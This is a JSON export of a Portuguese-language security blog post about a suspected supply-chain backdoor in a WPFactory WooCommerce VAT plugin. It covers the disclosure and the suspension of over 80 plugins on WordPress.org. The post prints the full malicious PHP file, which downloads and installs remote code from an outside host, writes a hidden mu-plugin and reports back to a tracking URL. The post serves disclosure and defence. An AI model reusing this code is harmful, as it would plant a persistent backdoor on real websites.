{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/pt\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Viola\u00e7\u00e3o de seguran\u00e7a na WPFactory: 170 000 sites WordPress expostos"},"content":{"rendered":"<p>O WordPress continua a ser o sistema de gest\u00e3o de conte\u00fados mais utilizado no mundo, impulsionando mais de 40% de todos os websites na internet. Desde websites de pequenas empresas e blogs pessoais a grandes plataformas empresariais e infraestruturas de com\u00e9rcio eletr\u00f3nico, o CMS tornou-se a espinha dorsal da web moderna. A sua popularidade deriva da sua flexibilidade, do ecossistema aberto e do vasto n\u00famero de plugins dispon\u00edveis para expandir a sua funcionalidade.<\/p>\n\n\n\n<p>No entanto, este mesmo ecossistema tornou-se tamb\u00e9m um dos maiores desafios de seguran\u00e7a do WordPress.<\/p>\n\n\n\n<p>Na Ferber Enterprises, a nossa equipa de ciberseguran\u00e7a monitoriza continuamente as amea\u00e7as que afetam o ecossistema WordPress, uma vez que as vulnerabilidades em plugins, temas ou cadeias de abastecimento podem rapidamente degenerar em ataques em grande escala que afetam milhares de sites em todo o mundo. Nos \u00faltimos anos, os atacantes t\u00eam vindo a visar cada vez mais os criadores de plugins e as infraestruturas de distribui\u00e7\u00e3o, em vez de sites individuais, permitindo que o c\u00f3digo malicioso se propague atrav\u00e9s de atualiza\u00e7\u00f5es de software de confian\u00e7a e canais oficiais de download.<\/p>\n\n\n\n<p>Esta semana, surgiu uma grande controv\u00e9rsia envolvendo a WPFactory, uma conhecida empresa desenvolvedora de plugins para o WordPress, cujos produtos est\u00e3o instalados em mais de 170 000 sites em todo o mundo. Mais de 80 plugins associados \u00e0 empresa foram temporariamente suspensos no WordPress.org depois de a nossa equipa de ciberseguran\u00e7a da WPFactory ter descoberto uma suspeita de backdoor na vers\u00e3o premium de um dos seus plugins.<\/p>\n\n\n\n<p>O incidente suscitou s\u00e9rias preocupa\u00e7\u00f5es em toda a comunidade WordPress relativamente \u00e0 seguran\u00e7a da cadeia de suprimentos de software, aos processos de revis\u00e3o de plugins e \u00e0 crescente sofistica\u00e7\u00e3o dos ataques que visam o ecossistema de c\u00f3digo aberto.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">A Descoberta do Comportamento Suspeito do Plugin<\/h2>\n\n\n\n<p>O problema veio a lume pela primeira vez depois de a nossa equipa de ciberseguran\u00e7a da Ferber Enterprises ter detetado um comportamento an\u00f3malo durante os testes \u00e0 vers\u00e3o premium do plugin \u00abEU VAT for WooCommerce Pro\u00bb, distribu\u00eddo diretamente a partir do seu site oficial.<\/p>\n\n\n\n<p>Inicialmente, a investiga\u00e7\u00e3o come\u00e7ou ap\u00f3s o plugin gerar um erro fatal durante a instala\u00e7\u00e3o. Durante a resolu\u00e7\u00e3o do problema, os nossos analistas identificaram um ficheiro PHP suspeito denominado class-alg-wc-eu-vat-customer.php. O ficheiro parecia executar um comportamento totalmente inconsistente com a funcionalidade esperada de um plugin WooCommerce VAT.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>De acordo com a nossa an\u00e1lise, o c\u00f3digo tentou:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Descarregar um arquivo ZIP externo de um servidor remoto<\/li>\n\n\n\n<li>Modificar as pastas principais do WordPress<\/li>\n\n\n\n<li>Comunicar com infraestrutura externa<\/li>\n\n\n\n<li>Potencialmente executar payloads remotos em websites afetados<\/li>\n<\/ul>\n\n\n\n<p>Estes indicadores sugeriram imediatamente a poss\u00edvel presen\u00e7a de uma backdoor oculta ou de uma comprometimento malicioso da cadeia de abastecimento.<\/p>\n\n\n\n<p>O que tornou a situa\u00e7\u00e3o particularmente alarmante foi o facto de o plugin n\u00e3o ter sido obtido a partir de um espelho n\u00e3o oficial ou de um reposit\u00f3rio pirata. O pacote foi descarregado diretamente do portal oficial de clientes da WPFactory, refor\u00e7ando as preocupa\u00e7\u00f5es de que o pr\u00f3prio canal de distribui\u00e7\u00e3o possa ter sido comprometido.<\/p>\n\n\n\n<p>Na Ferber Enterprises, document\u00e1mos imediatamente o incidente e inici\u00e1mos um processo de divulga\u00e7\u00e3o respons\u00e1vel, contactando a WPFactory diretamente atrav\u00e9s do GitHub.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Resposta inicial da WPFactory<\/h2><\/div>\n\n\n\n<p>A WPFactory respondeu inicialmente afirmando que o ficheiro e o comportamento suspeitos descritos no relat\u00f3rio n\u00e3o faziam parte do seu c\u00f3digo-fonte oficial.<\/p>\n\n\n\n<p>Um representante da empresa sugeriu v\u00e1rias explica\u00e7\u00f5es alternativas, incluindo:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Uma instala\u00e7\u00e3o local modificada<\/li>\n\n\n\n<li>Um ambiente de website comprometido<\/li>\n\n\n\n<li>Uma vers\u00e3o desatualizada de um plugin<\/li>\n\n\n\n<li>Uma fonte de download potencialmente adulterada<\/li>\n<\/ul>\n\n\n\n<p>A empresa declarou tamb\u00e9m que n\u00e3o conseguiu inspecionar em seguran\u00e7a o ficheiro ZIP fornecido, pois o navegador assinalou o arquivo como potencialmente inseguro.<\/p>\n\n\n\n<p>A nossa equipa de ciberseguran\u00e7a esclareceu posteriormente que o plugin tinha sido descarregado diretamente do site oficial da WPFactory e que o ficheiro suspeito continuava presente mesmo ap\u00f3s o descarregamento de uma nova c\u00f3pia da vers\u00e3o 4.6.1 a partir da mesma fonte.<\/p>\n\n\n\n<p>Este pormenor tornou-se fundamental para a investiga\u00e7\u00e3o. Se v\u00e1rios downloads independentes do canal de distribui\u00e7\u00e3o oficial continham sistematicamente o mesmo c\u00f3digo suspeito, a possibilidade de um site local ter sido comprometido tornava-se cada vez mais improv\u00e1vel. Apesar destas conclus\u00f5es, a WPFactory afirmou inicialmente que n\u00e3o conseguia reproduzir o problema do seu lado e alegou que o ficheiro suspeito n\u00e3o existia no pacote oficial do plugin.<\/p>\n\n\n\n<p>A empresa solicitou ent\u00e3o acesso de administrador e acesso FTP ao ambiente afetado, a fim de prosseguir com a investiga\u00e7\u00e3o. Na Ferber Enterprises, rejeit\u00e1mos esse pedido por motivos de ciberseguran\u00e7a. Conceder acesso privilegiado ao servidor a um fornecedor cuja pr\u00f3pria infraestrutura poderia ter sido comprometida teria representado um risco de seguran\u00e7a inaceit\u00e1vel. Em vez disso, a nossa equipa continuou a fornecer provas t\u00e9cnicas, incluindo uma demonstra\u00e7\u00e3o em v\u00eddeo que mostrava o comportamento suspeito do plugin imediatamente ap\u00f3s a instala\u00e7\u00e3o.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Escalonamento para WordPress.org<\/h2><\/div>\n\n\n\n<p>\u00c0 medida que a investiga\u00e7\u00e3o avan\u00e7ava, aumentavam as preocupa\u00e7\u00f5es quanto \u00e0 potencial dimens\u00e3o do problema. A WPFactory mant\u00e9m um vasto portf\u00f3lio de plugins, composto por mais de 65 plugins, com mais de 170 000 instala\u00e7\u00f5es ativas no total. Qualquer viola\u00e7\u00e3o que afetasse a infraestrutura de distribui\u00e7\u00e3o da empresa poderia, por conseguinte, ter consequ\u00eancias generalizadas em todo o ecossistema do WordPress.<\/p>\n\n\n\n<p>A nossa equipa encaminhou o problema diretamente para o WordPress.org, com o objetivo de impedir que outros utilizadores instalassem pacotes potencialmente comprometidos enquanto a investiga\u00e7\u00e3o estava em curso. Posteriormente, o WordPress.org tomou a medida extraordin\u00e1ria de retirar temporariamente mais de 80 plugins WPFactory do reposit\u00f3rio oficial.<\/p>\n\n\n\n<p>Esta medida chamou imediatamente a aten\u00e7\u00e3o de toda a comunidade de seguran\u00e7a do WordPress, uma vez que o encerramento em massa de plugins desta magnitude \u00e9 relativamente raro e costuma indicar problemas graves ainda por resolver. Na sequ\u00eancia da escalada do caso, a WPFactory reconheceu posteriormente que o problema parecia ser leg\u00edtimo e pediu desculpa por n\u00e3o ter agido mais rapidamente ap\u00f3s a den\u00fancia inicial. Representantes da empresa afirmaram que estavam a investigar ativamente o assunto e a trabalhar para encontrar uma solu\u00e7\u00e3o. Uma hip\u00f3tese levantada internamente pela WPFactory sugeria que um pacote de plugins desatualizado ou armazenado em cache poderia ter sido involuntariamente disponibilizado atrav\u00e9s da sua infraestrutura.<\/p>\n\n\n\n<p>No entanto, a nossa equipa de ciberseguran\u00e7a discordou desta avalia\u00e7\u00e3o. O comportamento observado indicava fortemente um problema de seguran\u00e7a mais profundo, potencialmente envolvendo sistemas de compila\u00e7\u00e3o ou distribui\u00e7\u00e3o comprometidos, ou inje\u00e7\u00e3o de c\u00f3digo n\u00e3o autorizada em ficheiros de plugins para download.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Porque Este Incidente Importa<\/h2>\n\n\n\n<p>A controv\u00e9rsia em torno do WPFactory p\u00f5e em evid\u00eancia uma amea\u00e7a crescente \u00e0 ciberseguran\u00e7a conhecida como \u00abataque \u00e0 cadeia de abastecimento de software\u00bb. Tradicionalmente, os atacantes concentravam-se em comprometer sites individuais diretamente atrav\u00e9s de ataques de for\u00e7a bruta ou de vulnerabilidades em plugins. Atualmente, os autores das amea\u00e7as visam cada vez mais os pr\u00f3prios fornecedores de software, uma vez que comprometer um fornecedor de confian\u00e7a permite que o c\u00f3digo malicioso se espalhe por milhares de sites simultaneamente.<\/p>\n\n\n\n<p>Esta estrat\u00e9gia j\u00e1 foi observada em v\u00e1rios incidentes de ciberseguran\u00e7a de grande destaque que afetaram ecossistemas de software globais na \u00faltima d\u00e9cada. Especificamente no ecossistema WordPress, os desenvolvedores de plugins representam alvos atrativos porque os plugins s\u00e3o inerentemente confi\u00e1veis pelos administradores e frequentemente operam com permiss\u00f5es elevadas.<\/p>\n\n\n\n<p>Se for introduzido c\u00f3digo malicioso num pacote de plugins distribu\u00eddo atrav\u00e9s de um canal oficial, os sites afetados podem, sem o saberem, instalar eles pr\u00f3prios malware. No caso do plugin suspeito WPFactory, as potenciais consequ\u00eancias s\u00e3o graves.<\/p>\n\n\n\n<p>Com base na nossa an\u00e1lise, o comportamento identificado poderia teoricamente permitir que os atacantes:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Implementar malware adicional<\/li>\n\n\n\n<li>Injetar spam de SEO<\/li>\n\n\n\n<li>Criar backdoors persistentes<\/li>\n\n\n\n<li>Exfiltrar dados sens\u00edveis<\/li>\n\n\n\n<li>Modificar instala\u00e7\u00f5es WordPress remotamente<\/li>\n\n\n\n<li>Manter acesso n\u00e3o autorizado por per\u00edodos prolongados<\/li>\n<\/ul>\n\n\n\n<p>O perigo de tais ataques reside na sua furtividade. As backdoors modernas s\u00e3o frequentemente projetadas para permanecerem inativas durante meses antes de serem ativadas, o que torna a dete\u00e7\u00e3o significativamente mais dif\u00edcil. No in\u00edcio deste m\u00eas, a equipa do WordPress Plugins informou ter encerrado mais de 30 plugins ap\u00f3s c\u00f3digo malicioso oculto, incorporado num portf\u00f3lio de plugins diferente, ter permanecido inativo durante aproximadamente oito meses antes de eventualmente ser ativado e injetar spam SEO em websites.<\/p>\n\n\n\n<p>Esta tend\u00eancia demonstra como os atacantes est\u00e3o a priorizar cada vez mais a persist\u00eancia e a ativa\u00e7\u00e3o retardada para contornar os mecanismos de dete\u00e7\u00e3o.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">Uma Crise de Seguran\u00e7a Mais Ampla no Ecossistema WordPress<\/h2><\/div>\n\n\n\n<p>O incidente WPFactory tamb\u00e9m p\u00f5e em evid\u00eancia desafios de seguran\u00e7a sist\u00e9micos mais amplos que afetam o WordPress no seu conjunto. O ecossistema de plugins expandiu-se drasticamente na \u00faltima d\u00e9cada, com dezenas de milhares de plugins dispon\u00edveis tanto em mercados oficiais como comerciais. Embora este ecossistema estimule a inova\u00e7\u00e3o e a flexibilidade, tamb\u00e9m cria uma enorme complexidade para a supervis\u00e3o da seguran\u00e7a.<\/p>\n\n\n\n<p>De acordo com o relat\u00f3rio \u201cState of WordPress Security in 2026\u201d da Patchstack, cerca de 461 mil vulnerabilidades conhecidas n\u00e3o foram corrigidas antes da sua divulga\u00e7\u00e3o p\u00fablica. Esta estat\u00edstica reflete a press\u00e3o crescente a que est\u00e3o sujeitos tanto os programadores de plugins como os investigadores de seguran\u00e7a e os respons\u00e1veis pela manuten\u00e7\u00e3o dos reposit\u00f3rios.<\/p>\n\n\n\n<p>Ao mesmo tempo, a fila oficial de revis\u00e3o de plugins do WordPress ultrapassa alegadamente os 4.000 plugins \u00e0 espera de revis\u00e3o. N\u00fameros como estes ilustram o imenso desafio de manter a garantia de qualidade e a auditoria de seguran\u00e7a em escala.<\/p>\n\n\n\n<p>Muitos criadores de plugins s\u00e3o pequenas equipas com recursos de seguran\u00e7a limitados. Outros gerem dezenas de plugins em simult\u00e2neo, ao mesmo tempo que implementam estrat\u00e9gias de crescimento comercial agressivas que envolvem aquisi\u00e7\u00f5es e a expans\u00e3o do portf\u00f3lio. A pr\u00f3pria WPFactory expandiu-se recentemente atrav\u00e9s de aquisi\u00e7\u00f5es, incluindo a compra da Extend-WP e dos seus 19 plugins em 2025, seguida da aquisi\u00e7\u00e3o da WBW e de v\u00e1rios plugins adicionais ainda nesse ano.<\/p>\n\n\n\n<p>A r\u00e1pida expans\u00e3o do portef\u00f3lio pode criar complexidades operacionais que dificultam a auditoria de c\u00f3digo, a gest\u00e3o de infraestruturas e a verifica\u00e7\u00e3o da integridade das publica\u00e7\u00f5es. Os atacantes est\u00e3o bem cientes destas realidades. Cada vez mais, concentram-se em explorar pr\u00e1ticas de seguran\u00e7a operacionais fracas dentro dos fornecedores de software, em vez de visarem diretamente os utilizadores finais.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">A Import\u00e2ncia Crescente da Seguran\u00e7a da Cadeia de Abastecimento<\/h2>\n\n\n\n<p>Incidentes como este refor\u00e7am a necessidade urgente de pr\u00e1ticas mais robustas de seguran\u00e7a da cadeia de abastecimento em todo o ecossistema WordPress.<\/p>\n\n\n\n<p>Na Ferber Enterprises, a nossa equipa de ciberseguran\u00e7a recomenda vivamente que os programadores de plugins adotem v\u00e1rias medidas de prote\u00e7\u00e3o essenciais, incluindo:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Assinatura de pacote criptogr\u00e1fico<\/li>\n\n\n\n<li>Pipelines de CI\/CD seguras<\/li>\n\n\n\n<li>Autentica\u00e7\u00e3o multifator obrigat\u00f3ria<\/li>\n\n\n\n<li>Segmenta\u00e7\u00e3o de infraestrutura<\/li>\n\n\n\n<li>Monitoriza\u00e7\u00e3o cont\u00ednua de integridade<\/li>\n\n\n\n<li>Auditorias de c\u00f3digo independentes<\/li>\n\n\n\n<li>Sistemas de compila\u00e7\u00e3o reproduz\u00edveis<\/li>\n<\/ul>\n\n\n\n<p>Os administradores de websites devem tamb\u00e9m fortalecer a sua pr\u00f3pria postura de seguran\u00e7a. Nem mesmo os plugins descarregados de fontes oficiais ou confi\u00e1veis devem ser considerados intrinsecamente seguros.<\/p>\n\n\n\n<p>As organiza\u00e7\u00f5es que gerem infraestruturas cr\u00edticas de WordPress devem considerar:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Manuten\u00e7\u00e3o de ambientes de staging<\/li>\n\n\n\n<li>Monitoriza\u00e7\u00e3o do tr\u00e1fego de sa\u00edda<\/li>\n\n\n\n<li>A digitalizar plugins antes da implementa\u00e7\u00e3o<\/li>\n\n\n\n<li>Limitar o uso de plugins<\/li>\n\n\n\n<li>Aplicar controlos de acesso de privil\u00e9gio m\u00ednimo<\/li>\n\n\n\n<li>Implementar a monitoriza\u00e7\u00e3o da integridade de ficheiros<\/li>\n\n\n\n<li>Utilizando Web Application Firewalls (WAFs) Geridos<\/li>\n<\/ul>\n\n\n\n<p>Em ambientes empresariais, a valida\u00e7\u00e3o da cadeia de fornecimento est\u00e1 a tornar-se t\u00e3o importante como a gest\u00e3o tradicional de vulnerabilidades. A suposi\u00e7\u00e3o de que os canais de software oficiais s\u00e3o sempre seguros j\u00e1 n\u00e3o \u00e9 realista no panorama de amea\u00e7as atual.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Rea\u00e7\u00f5es da Comunidade e Investiga\u00e7\u00e3o em Curso<\/h2>\n\n\n\n<p>A controv\u00e9rsia espalhou-se rapidamente pela comunidade WordPress depois de programadores, investigadores de seguran\u00e7a e fornecedores de infraestrutura terem come\u00e7ado a discutir o problema publicamente.<\/p>\n\n\n\n<p>V\u00e1rias figuras conhecidas dentro do ecossistema ampliaram a consciencializa\u00e7\u00e3o sobre a situa\u00e7\u00e3o, incluindo programadores que publicaram listas de plugins temporariamente encerrados e incentivaram os administradores a auditar os seus ambientes.<\/p>\n\n\n\n<p>Entretanto, a nossa equipa da Ferber Enterprises continua a analisar as amostras de plugins suspeitos e a monitorizar a procura de indicadores adicionais de comprometimento que possam afetar sites WordPress em todo o mundo.<\/p>\n\n\n\n<p>\u00c0 data da publica\u00e7\u00e3o, a WPFactory confirmou a exist\u00eancia do problema e afirmou que est\u00e1 a trabalhar ativamente para o resolver.<\/p>\n\n\n\n<p>No entanto, muitas quest\u00f5es permanecem por responder:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A infraestrutura de distribui\u00e7\u00e3o oficial foi comprometida?<\/li>\n\n\n\n<li>Durante quanto tempo \u00e9 que os pacotes maliciosos foram potencialmente distribu\u00eddos?<\/li>\n\n\n\n<li>Foram afetados plugins adicionais?<\/li>\n\n\n\n<li>As contas de clientes ou os sistemas de download foram violados?<\/li>\n\n\n\n<li>Os atacantes obtiveram acesso persistente \u00e0 infraestrutura interna?<\/li>\n\n\n\n<li>Podem existir cargas \u00fateis adicionais em estado dormente?<\/li>\n<\/ul>\n\n\n\n<p>At\u00e9 que estas quest\u00f5es sejam totalmente resolvidas, a cautela continua a ser essencial.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">O Futuro da Seguran\u00e7a do WordPress<\/h2>\n\n\n\n<p>O incidente WPFactory poder\u00e1 vir a tornar-se, em \u00faltima an\u00e1lise, mais um exemplo marcante dos desafios de ciberseguran\u00e7a que o ecossistema web de c\u00f3digo aberto enfrenta.<\/p>\n\n\n\n<p>O WordPress potencia uma enorme fatia da economia global da internet. Qualquer comprometimento em larga escala que afete os desenvolvedores de plugins pode, portanto, ter consequ\u00eancias que se estendem muito para al\u00e9m dos sites individuais.<\/p>\n\n\n\n<p>\u00c0 medida que os atacantes continuam a evoluir no sentido de comprometer a cadeia de abastecimento e de utilizar t\u00e9cnicas de persist\u00eancia furtiva, a seguran\u00e7a dos plugins j\u00e1 n\u00e3o pode ser tratada como uma preocupa\u00e7\u00e3o secund\u00e1ria. Na Ferber Enterprises, acreditamos que este evento serve como um lembrete fundamental de que a ciberseguran\u00e7a n\u00e3o se resume apenas \u00e0 prote\u00e7\u00e3o dos pr\u00f3prios sites, mas tamb\u00e9m \u00e0 prote\u00e7\u00e3o de todas as camadas da cadeia de distribui\u00e7\u00e3o de software.<\/p>\n\n\n\n<p>A confian\u00e7a em ecossistemas abertos depende da transpar\u00eancia, resposta r\u00e1pida a incidentes e pr\u00e1ticas de seguran\u00e7a operacional robustas. O ecossistema WordPress enfrenta agora um momento importante.<\/p>\n\n\n\n<p>A forma como os programadores, os mantenedores de reposit\u00f3rios, os fornecedores de alojamento e as equipas de seguran\u00e7a responderem a incidentes como este ajudar\u00e1 a determinar se o WordPress conseguir\u00e1 continuar a manter a confian\u00e7a de milh\u00f5es de empresas e organiza\u00e7\u00f5es que dependem dele diariamente.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_ua